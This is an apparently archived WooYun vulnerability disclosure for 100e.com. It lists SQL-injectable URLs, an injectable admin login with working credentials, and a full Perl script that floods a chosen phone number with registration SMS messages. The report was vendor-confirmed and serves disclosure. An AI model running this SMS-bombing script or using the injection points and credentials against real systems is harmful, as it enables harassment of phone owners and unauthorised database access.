当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011694

漏洞标题:100e一百易问题集合

相关厂商:100e.com

漏洞作者: Valo洛洛

提交时间:2012-09-03 14:45

修复时间:2012-10-18 14:46

公开时间:2012-10-18 14:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-03: 细节已通知厂商并且等待厂商处理中
2012-09-03: 厂商已经确认,细节仅向厂商公开
2012-09-13: 细节向核心白帽子及相关领域专家公开
2012-09-23: 细节向普通白帽子公开
2012-10-03: 细节向实习白帽子公开
2012-10-18: 细节向公众公开

简要描述:

见详细说明,多处安全漏洞,会导致8.7w用户敏感信息泄露。

详细说明:

http://edu.100e.com/course/instance/?id=4091


http://space.100e.com/myspace/MyDiaryList.asp?username=admin


都是注入
http://admin.100e.com 后台
登陆框是post注入


U:0001 P:111进入
后台有啥你们自己知道,8.7W用户的电话还是很可观的
后台也都是注入。


貌似是整个站只要是查询数据库的地方就有注入- -
shell不拿了,会有脱裤的嫌疑

漏洞证明:

然后,还有个强力的短信Ddos攻击接口,注册验证的地方~~
拿perl写了个脚本测试了下,好用!


use strict;
use LWP::Simple;
require LWP::UserAgent;
my $url = 'http://passport.100e.com/register/new/step_mobile.aspx';
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
print "请输入要攻击的手机号:";
my $dh=<STDIN>;
chomp $dh;
print "请输入攻击次数:";
my $i=<STDIN>;
chomp $i;
for (my $a=1;$a<=$i;$a++)
{
my $response = $ua->post( $url,
['postback' => 'postback',
'mobile' => "$dh"]
);
print "已发送$a次\n";
}


修复方案:

注入进行过滤,短信验证加上时间。

版权声明:转载请注明来源 Valo洛洛@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-09-03 15:40

厂商回复:

非常感谢

最新状态:

暂无


漏洞评价:

评论